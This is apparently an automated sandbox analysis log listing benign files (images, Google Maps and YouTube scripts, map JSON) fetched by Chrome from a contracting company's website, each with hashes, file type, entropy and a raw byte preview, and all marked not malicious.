                                              SHA-256:5081776D65F06B80E429D42745D58E63B5F6869FAE8D8729BFBE278523000333
                                              SHA-512:10DF4098F4B898BD81BA8F5851A702B2D616C4469662DD66A39EB71CAB15A684F6A301BBC853897146F571B1FC1F0D30842F7D541CC533CBEC0846542D1CDE8C
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):67992
                                              Entropy (8bit):7.996529119202125
                                              Encrypted:true
                                              SSDEEP:1536:xmpYDDaDI+L/GCfLfAnX067hDyWqdwmO76H7HAhO:dW/GCfkXt7heWgO767Aw
                                              MD5:F8E4559C38476C054B09E4415881923F
                                              SHA1:1E8AE023D4174FFDD059DBE5D0FCFFFDF3F7D3F4
                                              SHA-256:A0EE5D025E8B05327943F7E6D4D3E1BCA2DA9460B28755D3995908E0DA3C3E42
                                              SHA-512:F7D9EE905122B2C32574AF9FD9BAB48A72A7FBFE3884EA3FECCA64E140C5A69939D5D26FCB4CC6747424420A28620DAC425F333E2680548F495470A2BA827CF4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/11/dc8d49617e8c915bd5328fa315b82453.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 .....m...*....>.l.R)+3;&4..`..cnP.9u..~...g ..9...k.F.[x...I.hW.=Km....x...n.+k........m<...-...s.o.o..._..?.d.....O.G.w.O._.g.@........W.s...K.......'.....pW....`.I..........b...?[...#_........}..S.....{........~....%.............y..gD....6.>:....:...t....2..K..,..B.....8,...T@a.f..m.@.,.........V.l..v...b=.....cW...I..l....E2j...i>|..@..2.zA..l._................0...-..aA..%B.V.0..m.WI.v.-.%!.+#-K..{7.....P.9?....A{.g.....W|..Z.......:..tq.X..iH...e.D{.wz.dM.....O6H..Gu=.7%......kv.\y.s...U..=.....d.n.gI.......3....f.n0..'+..........`.x21.A....~...u.'.N.....a.a.(..w.......}.K..m.ad.*.x....YK+.......Vh....:.......!.S....).7b..W..-.....c`].=S.y...&u..=tX..S*Iq....w.-.t....G9....`...X.:.D1K.....s...vw......t....P.Z.x.q.|..e(...U.3.."._..y..OK..S.o.}...2\...0.U")...cS;qL....G..{..._..znG.*..Gc..&..A%.&....).aH~V. .6..C..A>..(.>....=F5..;A.F.AE..3..N...7..h..M:4...\.z.a.`...M0t......e..ra.6.mZJ.^.m..CBW.I.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:downloaded
                                              Size (bytes):94270
                                              Entropy (8bit):7.9817655469616
                                              Encrypted:false
                                              SSDEEP:1536:BiVYWpZdf5goNo8cQVQNrgvgos7mHxg306ObFRl6z6QSX68SnMI1Cx57JB33BenA:8VYydyoe8tVUrahs6606SFP6wq8S1CRR
                                              MD5:96BFC6FA04E67F72AEBCDA070533156A
                                              SHA1:B7C1C40E1A4C049B9C248C5E8CFEE26008765749
                                              SHA-256:E08BE39B07263BAF48BE0E75C6FC8065FF76CABE1FECDA01E5A57414E0FB5268
                                              SHA-512:61BB359418C4F65CD2D7D74F0876769E437C749ADD9446EA721B540DCD9CE165600027B893457D9942FE96B4D265DF63AEE0BFB17F11A08D114C395CF30B0310
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/news/4/0538734f181f0860806608250501d2ae.jpg
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."................................................$..Bj. ......".(.....v.-........P..*V..;{.7. ....(....*.......*........7.).E@..E.P.p........-.....P.b.........DT.....#...S..... ....P.E.....^........@....*............k.9d.k.......T.E...S.5g.........( ...E@.......(.....{W....\.......(....L....D..A@....."...p4s\ ..k...4.>Ob ..".8...@...P..]GA.q....j.(#....AP.....T.DQ..P^...T....E.P...P."(.pu.R."`.(...6.................;N;j.*.(...........&m..M.....@......@....E.....Az~... ...........h..s.6}w...E.PT<........@.P....V..K.n...P..Q......8ADX..m.Z....... .* ..(.........*.S. ..Q..E.D...(.....Y..../.. *.EA|...EE@A@.........l...@...QP..T..E....D..(+o.f...TA..J. ....p\...(......A.2....................i{.>r. *..` .......'............h...5..(3..U@..E...S.%...H...<T.@P@E.Wk..!...k..V.).8..E.4c..k.Z.@Up.( ....P!.'k{?4.@..<TT
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):2391
                                              Entropy (8bit):7.8792374027186165
                                              Encrypted:false
                                              SSDEEP:48:XUVuLu6p8UVJP2Abuc17biBqq+oxjgdYVAapBBh5PDU1sWbUObCuz:XUQu6uCJOAbJ17biBj6yVrp7htDU1sWB
                                              MD5:397B13FD6DF6AEBCCF48D3F44B610257
                                              SHA1:4B52F76A3FB629B8861ADC925033B4B19E32096D
                                              SHA-256:877D58221494BBCB749C721BD28FC1BED5B01709FF50723C1CF36073B8FC9761
                                              SHA-512:51C1AB80FA5074A559E1F1C5FF492F74FEA81EB52BE802D960FEAA6C6D9B018737A451305885B6B568C35FA23E2A48D9365B58F6A78701F52E1F01C6366CBA0E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/email.png
                                              Preview:.PNG........IHDR...d...d.....G<ef...]PLTE.......@2....93.D8..........A4.;7.B9.B:....2.....64.........SJ.1)........up.VT.......GE.hg.+.9....IDATh..Z.r..D`Dd.........`.tk.W.......1.=.....././..9Hl...Z.1.F..].i..d......x<.&.kIl\.(.k.+[N......!0...!.~.2....M#.Q..u....8G1...@F..'.mj/t<n/..a;.._....1......=.F...`...".|...)B......lP*Lg..w.4...l....'.5..m.L...AK..(.F.{.j.!..~.q..,].....e.-.+mk..Y.}.._...G!._.c.7.mK..b..p.L.8`..a{.%..\..@<W]i}......J'.B...9...R..n...)+A....T.....g..FBueI.`.T.rh.#2F.V...`Kg. .p.mUiKr..KUl m....DV.&.P.*!V........0.q.3B.U.=..a..R..m-.Z, ...........+.%.'.a.1. .a.m..9.d..B.T.?*...s.z..u.{|....L....<..v...........P.....@5.U]W0.+.....R.].^7.O..R".I_.H.@B*.V.*....A.._{2V(.x.....3./y.[.... .;%.~......BA1#i.W....S......1\...P..b.;..).[*.o...@e.I.1._..z)..e]%*,.....u...R$..9I.....a..%..'..P.t.$a.3]G.$.....]..k*...C....25k..R.....!..&.0.IJ.A.4..o.a..2.....L...P...q.s0..<.=..n...........SH.B6..8..T&+..<..2\H....:p?L.Tb.b..e.7I>w.'..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):10705
                                              Entropy (8bit):7.496423803227372
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw8o+0QOMP3Yz3wbf1TYtE6SO/Cv:4YNg78o3QOMQzApQg
                                              MD5:7BF51A6D0C00D7C4695A5176C37A5F58
                                              SHA1:29BFDF68833B8A203DCF2CD2EB995150C86948F6
                                              SHA-256:0EEB2B5B51EB9D0BB4AD4FFC6A0F565834759719D8F3CE628767D77DABDA7840
                                              SHA-512:2DDD6EF23D4D4BDF9EABDEAA697CC5CF00129F06FC571433ECFBF907D1B6C79D65854BB1F44CBBEF60CF544C2D9AB058D06B8E54015C0280A98567B2E1B82B5F
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (2406)
                                              Category:dropped
                                              Size (bytes):78365
                                              Entropy (8bit):5.456753311036989
                                              Encrypted:false
                                              SSDEEP:1536:o/oPKW2/xQEiuVQf4bLR5dz34pkpZZvqxdESTsBKX4cg6KlJHkOV5FdaJC03Xu2i:uoPK//xQEiuVQf4btr32MZdqxGSgBKXQ
                                              MD5:9E43F550A52998CA7A0FD723D116582E
                                              SHA1:C6E39D9DFD56C38AA062CACF979D690C44E03C0F
                                              SHA-256:311E9E8A1ABDA5299C796E9DE880B4589FC5D52C72C0317DC5FF789B7929066F
                                              SHA-512:F759B63313B11E34815FE52186D31B6F1C9DC7B4A9D7D5425B5BF3048F5C005C85EFC044C342EF8B8A2B068FAE418EC0F44BEC148B59A29E2F40354DCB2F5C57
                                              Malicious:false
                                              Reputation:low
                                              Preview:google.maps.__gjsload__('map', function(_){var Gva=function(){var a=_.dr();return _.gi(a.Gg,18)},Hva=function(){var a=_.dr();return _.H(a.Gg,17)},Iva=function(a,b){return a.Eg?new _.cm(b.Eg,b.Fg):_.dm(a,_.lr(_.mr(a,b)))},Jva=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Kva=function(a,b){const c=a.length,d=typeof a==="string"?a.split(""):a;for(let e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return e;return-1},Lva=function(a){return new Promise((b,.c)=>{window.requestAnimationFrame(()=>{try{a?_.Km(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attempt.")):c(Error("Error focusing element: null element cannot be focused"))}catch(d){c(d)}})})},Mva=function(a,b){a.Fg.has(b);return new _.gra(()=>{Date.now()>=a.Ig&&a.reset();a.Eg.has(b)||a.Hg.has(b)?a.Eg.has(b)&&!a.Hg.has(b)&&a.Eg.set(b,"over_ttl"):(a.Eg.set(b,_.Dn()),a.Hg.add(b));r
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (3391)
                                              Category:downloaded
                                              Size (bytes):68468
                                              Entropy (8bit):5.597063427359037
                                              Encrypted:false
                                              SSDEEP:768:tSx+1QK2AEU2AEWWHZjyDD+Y66riwUyb+/8Fo6aM9dFDZvKa:YOEfgq/8ea
                                              MD5:853383CEE0C7AD876D409ADCDE0D12E3
                                              SHA1:3F633067AFB665F5B2621625E4836F44F24FC5DF
                                              SHA-256:86FB08163A30352733E67B1B7A107818CCC4C8B632D914421AB84075D6A17730
                                              SHA-512:4516945D51B81FB447AB18212F3C7051989738CADA658CCC54C8459E630978B5767C7793FE8517FB89E573DE814759E8B27EC1F88933C65E672DDF9F043C1156
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/26636eff/player_ias.vflset/en_US/embed.js
                                              Preview:(function(g){var window=this;/*. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/.'use strict';var Ehb=function(a){a.mutedAutoplay=!1;a.endSeconds=NaN;a.limitedPlaybackDurationInSeconds=NaN;g.AQ(a)},Fhb=function(a){g.Po(a);.for(var b=0;b<a.eg.length;b++){var c=a.eg[b],d=a.Ry[b];if(d!==c.version)return!0;if(!g.No(c)||c.Pm)if(c.Pm||c.s_!==g.So)(c.P1(c)||Fhb(c))&&c.Q1(c),c.Pm=!1,c.s_=g.So;if(d!==c.version)return!0}return!1},b4=function(a){var b=g.Lo(a);.a={};return a[Symbol.dispose]=function(){g.Lo(b)},a},Ghb=function(){return{I:"svg",.X:{height:"100%",version:"1.1",viewBox:"0 0 110 26",width:"100%"},V:[{I:"path",Fc:!0,S:"ytp-svg-fill",X:{d:"M 16.68,.99 C 13.55,1.03 7.02,1.16 4.99,1.68 c -1.49,.4 -2.59,1.6 -2.99,3 -0.69,2.7 -0.68,8.31 -0.68,8.31 0,0 -0.01,5.61 .68,8.31 .39,1.5 1.59,2.6 2.99,3 2.69,.7 13.40,.68 13.40,.68 0,0 10.70,.01 13.40,-0.68 1.5,-0.4 2.59,-1.6 2.99,-3 .69,-2.7 .68,-8.31 .68,-8.31 0,0 .11,-5.61 -0.68,-8.31
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 22 x 22, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):3429
                                              Entropy (8bit):7.9008187670194205
                                              Encrypted:false
                                              SSDEEP:48:u/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODdPlSw1lHK:uSDZ/I09Da01l+gmkyTt6Hk8nThlfgH
                                              MD5:A1DD359517B8BB2262F12C2674385898
                                              SHA1:28DCE6C0589ABB0A13AB9B6EE4B47EE17DBC85DA
                                              SHA-256:7BF65445CFB18EC423EACB8ED920F41126178515E22D00D7C8FF249CB1144D13
                                              SHA-512:943BC6124DC8B8705E7C1FF1E151F5DCDABD5F044819A0B2AB449BF72AE427CD18D4560D483271CE561C355013BAD2BB8EBD0F450A44ECC07EE7BDCE2B0E3A66
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............l;....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 225 x 225, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4787
                                              Entropy (8bit):7.900057661601453
                                              Encrypted:false
                                              SSDEEP:96:g+TpY7Vfhyets12eWJrFfElsTF7dXIbbK9eBAkGTGnFGB:3wVZyj12ewFTFpYbBDCio
                                              MD5:61D0908DA0BC284F297C2CE6A61647A7
                                              SHA1:08B574C7432DEB4D338BCEEA22B35D8CE8F26F63
                                              SHA-256:AAE63A9351072889879D6F8BAA53FDA9E41F5DE5E44DD048D1709B545758A31B
                                              SHA-512:5C8E493A5656B43DC87CA609FA6ECBC0EBF5F8D34F92C9694CBFFADFB1DA0018B0FBE41EFB3863D471AABBC6F4EADF4F6FFC24004AB0B2CAF21FF894078B5A89
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/zoho.png
                                              Preview:.PNG........IHDR..............m"H....PLTE....F>.....f.k..m.%&.F......v....#."3."3..."2.....L........g.....I...."2."2...."1.....g.q...K."4.."....o...L.x............P....&.f.!.C...!.H.=4...........K....x............Q......m.r....|v.ga......6,.ZS..............}..q....'.........mw....Ua..........&v.{.......................nt.$&.LQP... .9=.tn......}#)`.r.....E.XK....<..}..S.....g..p...Q.....;F....LV.`h1..`..O.eO.{..............s.Zof>..|..PqL3....s1'i._...k..../N.p..9k.W..S..k...|....|..J.T..y..N.ql.....z.O......\i.P?.o..h.(a....pIDATx...._[.....J$....6..]2.)Ih0.-y...C-.S.tB..bb.:@.[g\,..n.h.k....9.>Q..K..|~.........9...fSQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ.H.>........e../...n..1.S.......83.P....p.N3.u...#$z.......~...@ .7l.A..Q.....t.,.~......."..|...>U.5.J.3...3..v..3....0.6.l.f.i8!.qD{....%6...Q...4.....s!CiD{..9+l4..h..m.....?.U@..mo_...F.:.....Lx.(.....l.x.1Lm4...i>.d@.a..5..%.......l...........O.Ah6Lic...Hi4..'..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3403
                                              Entropy (8bit):7.9138281864818225
                                              Encrypted:false
                                              SSDEEP:96:GAtGT/yKWD1DyPiU5NfwYZybAnFoyi+ZPoo2:XtGTlW9qiU5NfwlbAFosh52
                                              MD5:403F1A70A16E4C4F731D846D382AACCD
                                              SHA1:D73DE002294E0BB89A4458B016EEC5B415A83EED
                                              SHA-256:A5419E434CB77652BDD8A0C329B980A523D34D334688B25580BA597EA0F8FFAB
                                              SHA-512:D5C70A0C302EF9969EC5A2A196A308B5144F80EACB3BFF4E3EA429B2CF5AE6D93D140291677721B61817E31D91FF4E6FFEF4F992EF711C5DF57B802B90366A5B
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE....;...............5.8..5...........n.....]..."....>..............D..K..8..f.....w.....=........<.....V..4..|S...........1......?o.P.. 3.......1Q.7..C{....J.........'.5Z..........&=..!.......D..O..+F../.:g..(.J......................L.....)F.......8f....].......}.H.....+..........%2...v..Em.....r.........3Z."..S..!...,..............N!...V.......Z=.k..qn..i...R\..........E!.D...(.F....7=........:B.Zk.iM.AC.pl."(.Y..7..8\....PIDATh..[.......k...%.....0.....UY.uA.)je..ZG;3N..V.[.M..v.?..9.\..+~...y.;.9..E]R.+...(A.Y.1).0.-.A.S.IE.%(...F!.E.(.... .2/$...%$.....$.. ...DQ...3...}.......$O.H..D..Z...1h8#...}.....?[s...8.W..zIpGpCd1...........?.^.z.&.$...c0H...g.E......x....w/.....^............9........._.....I.Z.G1`..qg..s`.'....YVW...o......NNC.D........!(..`#.....R.Cb0(.....)]..xH@.".8:....a.(...........C........B.Y..UI....&..P^...n...89l.......$.XU_/...$...;.q...t....B......\......W.Z.7..Tp.O..^.r..@L.e.s....".A.V6
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):16742
                                              Entropy (8bit):7.978474618470364
                                              Encrypted:false
                                              SSDEEP:384:niwSNkcDDRyIFpQZOty/n1l0gnz1pJNBdd4g:iJKcfRypOtyvLxpddd5
                                              MD5:9AE6028EBBE2D03C3861094288639F14
                                              SHA1:73F35DCDDDF1C2B0D679599F45837A68EBA64359
                                              SHA-256:61DA8F742A1154FA26FE81C8DA52F43665D835BC69CDC721B8705C3665013C67
                                              SHA-512:CD0406C8D2826BF7B571F56E51C961DAB7EB0FBA5CE042243903437FC3B7DB1BD06F1B0A82435406B3C3FA52848FC5D605132C6F4BCBF6F3024C4D906CB6C1BA
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21413!3i14012!4i256!2m3!1e0!2sm!3i707457593!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=102905
                                              Preview:RIFF^A..WEBPVP8LRA../..?......Th.fd..=t._..BQ$I../.....jp..%..$5"....t`.......?.$M..3......a..~..k0........b.....P..P...m.i.%=.SJ..=)..U.Y._f.g..G..Q....&.YN#|R...x.-km.....7.ZbL.&Q..Z{.......<<....C.m.nD.i.T.....u})..:.N..d]."|.K.^...2I.i...{..k.{q._..:.R..{2.....hVui.7.....5..$r3kV.>=.GW..7A.......k...@{9..X...Z.....4..2Og...v..m;...4..H..^...k..y.ou.PW.=..%>f0.I..'..i._.0.O$.[...%.{"....to...-.s1u-.R.862..oh..T.]{.2...6...fh..^.:.^...6'...H..t.....v&.......F.0...Rd%.Z..n.~8.E.5..u...q.!.6..r....B..Z..].0&.....@.;.wt. .. M...{@...\...w..s9..*4W.o....../.<..vZ..}?.p..=.-2.m.1a9....@E.)*n.../q:...N;H.........e*(.$............\.K...E.Pq-......\*..W.kS...A...ST...H.2.....X..AE)e,m:\w........2...T......rm...i..6..2....o<$'..~..LD).)...am...1.........mww.w.....G...H....B..,.f...*.OQq+>D.'.........g..O..hmG;....7..m...H..V+...Z....s.....c...\.yE.i.Z..G..d..s..l.._WrO.orZ..R....v..].. .D'6..,iB..@*...@.a......A4...`...>..J..J...0.Rw..Q"MS
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):10997
                                              Entropy (8bit):7.498153596066984
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwI78WPhoZ/ZgV1tSdDD/3sZu42iUZc+zmbB1EeksONRsA1:4YNg7CjhfSdDD/3sZu+WOCeONGW
                                              MD5:11E36F010A96EA86CAB102C86779FFB2
                                              SHA1:6B36B88B94D883E03067C30DC5563E6DE970C1C8
                                              SHA-256:90E23BF75DAEB2B1A86137E13C6A7B99A0E65251C6F449BAA33A56792A1FFFE7
                                              SHA-512:EF177EC1B4B4AEFF775429E0EFF0CCFEFEDA8BDB732F69B3953FD63B6F272C0E3635A91DBD2B3632FAA5BCD53522F49E18C0068C17287E5E5BF836D0C67B98D1
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/68/e43d801b28d951f86f26124770c0a020.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):15416
                                              Entropy (8bit):5.060834396970304
                                              Encrypted:false
                                              SSDEEP:192:vS1F9gcD+44hNHMG40ZZN2PAQ9hrXx38eNSnfk:K1F9gcD+XNHMQZSPAQzrXtnUfk
                                              MD5:1BE3CAA73D666B1F13CB2CD2117AF675
                                              SHA1:8985B813C50700691190F8AC433E1B8C55063C13
                                              SHA-256:924FA35CE56189C59F40ADE7915B5BC70A638BFF25F3CFCDB8E8386D2CF4DE4F
                                              SHA-512:17F15BC1D081F91748A112233512AC00D94E40C914E268D0D5434EB8F2466B2EE9ED37699AE77747772235D702B77118396AC4951A6909963DFFBEEBD623664E
                                              Malicious:false
                                              Reputation:low
                                              Preview:[{"id":"vuwtuwvwtwuuuvv","zrange":[15,15],"layer":"spotlit"},{"id":"vuwtuwvwtwuuuvv","base":[1403211008,918362624],"zrange":[15,15],"layer":"m@707457653","features":[{"id":"0x3e5f42035d9872df:0x29698a78cf7295ef","a":[0,0,1403211008,918362624,1403211008,918362624],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-73,-34,-10,-16],"c":"{\"1\":{\"title\":\".... .....\"}}","io":[0,-13]},{"id":"15761866242058864553","a":[10752,-26624,1403221760,918336000,1403221760,918336000],"bb":[-6,-6,6,6,-6,-6,6,6,-6,-6,6,6],"c":"{\"1\":{\"title\":\".... .... ... ..... ...... 1\",\"is_transit_station\":true}}"},{"id":"12525154212830278467","a":[41984,-47360,1403252992,918315264,1403252992,918315264],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,2,-126,-27,-10,-9,-101,-13,-9,2],"c":"{\"1\":{\"title\":\".... ... .......\"}}","io":[0,-13]},{"id":"2773930797817177075","a":[31488,-18432,1403242496,918344192,1403242496,918344192],"bb":[-11,-29,11,2,-11,-29,11,2,-11,-29,11,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):16112
                                              Entropy (8bit):7.981733788557358
                                              Encrypted:false
                                              SSDEEP:384:6Vep4CWsfb3olIUjU4c1TKY8ZsxCXyB/PFHq3SvQ:me1b3olIUjUn/8cC6NHq3SvQ
                                              MD5:904F0FCE3144974E27B270009EB59034
                                              SHA1:127533E94731F1D7D9867BABE5FAC0496F91BC20
                                              SHA-256:A185EB6BF39D270CCE11A7C40D7A4FB5F485F19B3B4730FF5BDCF5AD9B762028
                                              SHA-512:02F1116DC57F5D8243E23DC4F1ACCDFA125366091FE5698A1014B3DB05F66BE738700452B627BFFE275EE74F59BC62F22739A6651A6E57EA1417BC668A4ED57D
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.>..WEBPVP8L.>../..?...6..X.......MZ""$.l.}...p......w..#*.l.!$s.g...m'.K2...Km.I.|B..N..;.!.(L.D!.DG......$C$.?..........&...'.A"..F.....f......../C...rP..wDAQf.A4C3H.02B2.yx...Z<...........#...5.YY.q.........E..S..wE....e.v...Q...^O.*Y..R.....*...sVq.......5o^s.5o^sV.`.e#..f.o.L2.I..L...L...5k..._...9.m...l..U...l.......4..ZU*.......&&j...{...0..``.2.&.)....,.....[.....D...l+a.K.Zb.F.I~......aWt.......x...._..<..... ..eJ......Z...b.....m..)S...%.T..k....S..-....>"v...K._..A4.o...ibP.7.'`.&.....z......(..(....n.03.............+......o..H...u......>.8..YD..F._.....!"^.0.Y . ....."z.U.5\.....E..9/...).VQ..#.q..+..ON.?\#03B./...1w[..5......^5...2.:D......x...xnd.M.E....s.........H.e...F.*....M.~..A.=..o......D..m...r.u.kF...6.u%D..E .%..B.... ~s...b...Z.AV...o..S.....z1..d...0C.>..}........{.....E.....Q.....Vz.p..or.-.F~+.N^\+p.V.......X....N.u./..v-.G.......u....n..g.../q).,R..Z.....`..dM.R....2|.9..b%V.r...U..c.s.1q....z.aQ
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):18568
                                              Entropy (8bit):7.981634812283508
                                              Encrypted:false
                                              SSDEEP:384:K0wZKC3JcVss+c8NeDhjqxsZKL0/W6WnDH09bsKgakm6+Vz+rrATgAJN:K3lJcZfjDhjq24L0/W6WnDH0ZBhp+80o
                                              MD5:BC838B187D7E563DEC3C9AA8F0B4D80C
                                              SHA1:60AFF6F5802E6DAA88E10219117D117DCE5D19FD
                                              SHA-256:719A86523239FB9CAAEC3AEF8C54ED2AA8D3FC3A3AF474D6891A16F6B101E142
                                              SHA-512:42A426BBE00334E667226B8D04F1F63B12FC9FC6BAF9D95483FDDBB1051E0D7FEE4A4B1AAF4F24851A04F813D9A48CC7576BF0A6377708FE3164BF7DF84A149E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/22.png
